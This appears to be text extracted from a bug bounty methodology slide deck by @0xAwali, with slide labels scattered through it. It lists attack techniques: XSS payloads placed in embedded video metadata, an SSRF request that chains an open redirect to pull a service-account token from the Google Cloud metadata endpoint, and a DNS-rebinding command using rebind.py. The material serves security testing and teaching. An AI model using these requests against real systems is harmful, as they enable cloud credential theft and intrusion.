If You Can Embedded Videos From Services e.g. Vimeo , Youtube , Twitter , AND
Facebook , Try To Inject XSS Payloads In Their Title AND Description To Get XSS

● Tweet
My Methodology

attacker

Try To Use Open Redirection To Bypass The Blacklist e.g. http://www.company.com/redirect?url=


http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt
=json To Extract Google Metadata

● Video POST /Interaction-File-URL HTTP/1.1


Host: www.company.com
User-Agent: Mozilla/5.0
● Video Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
● Blog Origin: https://www.company.com
Content-Length: Number
● Writeup
File-URL=http://www.company.com/redirect?url=http://metadata.g
oogle.internal/computeMetadata/v1beta1/instance/service-accoun
ts/default/token?alt=json
My Methodology

attacker

Try To Use DNS Rebinding Technique By Using Tools e.g. Singularity OR rebind.py
To Bypass The Blacklist

● Video
● Video Steps to produce :-

● Video 2 - Open Your Terminal


3 - Write This Command
● Writeup ./rebind.py --ip1=Blacklist --ip2=Allowed --scheme=PORT
Mark Valenzia ● Tweet #BugBounty #BugBountyTip
Hack3rScr0lls ● Tweet #BugBounty #BugBountyTip
Thank
You
Mahmoud M. Awali
@0xAwali

You might also like